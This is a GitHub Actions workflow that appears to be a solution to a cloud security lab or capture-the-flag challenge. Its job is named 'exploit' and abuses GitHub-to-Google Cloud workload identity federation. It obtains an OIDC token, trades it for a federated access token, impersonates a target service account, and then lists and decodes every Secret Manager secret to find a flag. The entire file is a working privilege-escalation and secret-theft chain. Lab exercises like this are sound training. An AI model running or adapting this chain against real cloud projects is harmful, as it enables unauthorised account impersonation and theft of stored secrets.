name: gh-oidc-gcp

on:
  push:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

env:
  PROJECT_ID: gcp-labs-r4latnz5
  PROVIDER_PATH: projects/263429482138/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider
  TARGET_SA: iam-lab-7-target@gcp-labs-r4latnz5.iam.gserviceaccount.com

jobs:
  exploit:
    runs-on: ubuntu-latest
    steps:
      - name: Install deps
        run: |
          sudo apt-get update -y
          sudo apt-get install -y jq

      - name: Get GitHub OIDC token
        run: |
          TOKEN_JSON=$(curl -sS -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
            "${ACTIONS_ID_TOKEN_REQUEST_URL}&audience=//iam.googleapis.com/${PROVIDER_PATH}")
          echo "$TOKEN_JSON" | jq .
          OIDC=$(echo "$TOKEN_JSON" | jq -r '.value')
          echo "OIDC=$OIDC" >> $GITHUB_ENV

      - name: Exchange OIDC for GCP federated access token (STS)
        run: |
          cat > sts.json <<EOF
          {
            "audience": "//iam.googleapis.com/${PROVIDER_PATH}",
            "grantType": "urn:ietf:params:oauth:grant-type:token-exchange",
            "requestedTokenType": "urn:ietf:params:oauth:token-type:access_token",
            "subjectTokenType": "urn:ietf:params:oauth:token-type:jwt",
            "subjectToken": "${OIDC}",
            "scope": "https://www.googleapis.com/auth/cloud-platform"
          }
          EOF

          ACCESS=$(curl -sS https://sts.googleapis.com/v1/token \
            -H "Content-Type: application/json" \
            -d @sts.json | jq -r '.access_token')

          echo "ACCESS_TOKEN=$ACCESS" >> $GITHUB_ENV

      - name: Impersonate target Service Account (iamcredentials)
        run: |
          SA_TOKEN=$(curl -sS \
            -H "Authorization: Bearer $ACCESS_TOKEN" \
            -H "Content-Type: application/json" \
            -X POST \
            "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/${TARGET_SA}:generateAccessToken" \
            -d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}' \
            | jq -r '.accessToken')

          echo "SA_TOKEN=$SA_TOKEN" >> $GITHUB_ENV

      - name: List secrets and read latest (flag)
        run: |
          echo "[*] Listing secrets"
          curl -sS -H "Authorization: Bearer $SA_TOKEN" \
            "https://secretmanager.googleapis.com/v1/projects/${PROJECT_ID}/secrets" \
            | jq -r '.secrets[].name'

          echo "[*] Reading flag (try each secret if needed)"
          for s in $(curl -sS -H "Authorization: Bearer $SA_TOKEN" \
            "https://secretmanager.googleapis.com/v1/projects/${PROJECT_ID}/secrets" \
            | jq -r '.secrets[].name' | awk -F/ '{print $NF}'); do
              echo "---- SECRET: $s ----"
              curl -sS -H "Authorization: Bearer $SA_TOKEN" \
                "https://secretmanager.googleapis.com/v1/projects/${PROJECT_ID}/secrets/${s}/versions/latest:access" \
                | jq -r '.payload.data' 2>/dev/null | base64 -d || true
              echo
          done
